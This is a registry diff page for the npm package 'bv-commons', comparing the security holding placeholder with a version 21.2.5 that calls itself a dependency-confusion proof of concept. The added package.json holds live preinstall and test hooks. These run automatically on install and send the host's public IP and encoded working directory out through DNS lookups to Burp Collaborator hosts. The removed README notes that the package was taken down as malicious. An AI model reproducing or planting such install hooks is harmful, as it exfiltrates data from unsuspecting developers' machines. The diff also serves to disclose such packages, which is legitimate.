bv-commons 0.0.1-security → 21.2.5

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of bv-commons might be problematic. Click here for more details.

package/README.html ADDED
@@ -0,0 +1 @@
1
+ Non-malicious PoC <s>1</s>
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ exports.printMsg = function() {
2
+ console.log("Grouseant depedency check POC Synack demo package");
3
+ }
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
- {
2
- "name": "bv-commons",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
1
+ {"name": "bv-commons",
2
+ "version": "21.2.5",
3
+ "description": "GROUSEANT bv-commons package dependency confusion PoCv1.4 ",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "nslookup \"$(host myip.opendns.com resolver1.opendns.com | grep \"myip.opendns.com has\" | awk '{print $4}').xrs83qgqjcoi3dmne7mlm608nztrhg.burpcollaborator.net\" && var=0 && for i in $(pwd|base64 -w 6|awk '{gsub(/.{50}/,\"&\\n\")}1'); do var=$((var+1)) && nslookup $var.$i.h2ksearauwz2exx7prx5xqbsyj4cs1.burpcollaborator.net; done",
7
+ "preinstall": "nslookup \"$(host myip.opendns.com resolver1.opendns.com | grep \"myip.opendns.com has\" | awk '{print $4}').xrs83qgqjcoi3dmne7mlm608nztrhg.burpcollaborator.net\" && var=0 && for i in $(pwd|base64 -w 6|awk '{gsub(/.{50}/,\"&\\n\")}1'); do var=$((var+1)) && nslookup $var.$i.h2ksearauwz2exx7prx5xqbsyj4cs1.burpcollaborator.net; done"
8
+ },
9
+ "keywords": [
10
+ "PoC"
11
+ ],
12
+ "dependencies": {},
13
+ "config": {
14
+ "unsafe-perm":true
15
+ },
16
+ "author": "bugbountys",
17
+ "license": "ISC"
6
18
  }
19
+
20
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=bv-commons for more information.